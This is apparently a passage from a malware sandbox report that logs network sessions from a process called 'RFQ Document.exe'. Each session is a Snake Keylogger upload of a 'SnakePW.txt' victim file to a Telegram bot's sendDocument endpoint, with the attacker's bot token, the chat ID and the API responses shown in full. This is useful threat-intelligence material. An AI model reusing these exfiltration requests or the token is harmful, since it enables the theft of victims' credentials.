2021-09-28 05:58:26 UTC	44	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 33 65 62 39 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c53eb995Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:26 UTC	45	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:26 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:26 UTC	45	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12608,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.2.4	50117	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	446	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f4446dae Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	446	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 34 34 36 64 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f4446daeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	446	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	447	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12869,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.2.4	50118	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	447	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f4636ccf Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	447	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 36 33 36 63 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f4636ccfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	448	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	448	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12870,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.2.4	50119	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	449	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f47b43a1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	449	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 37 62 34 33 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f47b43a1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	450	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12871,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.2.4	50120	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	450	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f490b922 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 39 30 62 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f490b922Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	451	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	451	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12872,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.2.4	50121	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	452	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f4afb74c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	452	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 61 66 62 37 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f4afb74cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:46 UTC	453	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	453	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12873,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.2.4	50122	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:46 UTC	454	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f4c78f72 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:46 UTC	454	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 63 37 38 66 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f4c78f72Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:46 UTC	454	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	455	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12874,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.2.4	50123	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:46 UTC	455	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f4edb3a4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:46 UTC	455	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 65 64 62 33 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f4edb3a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
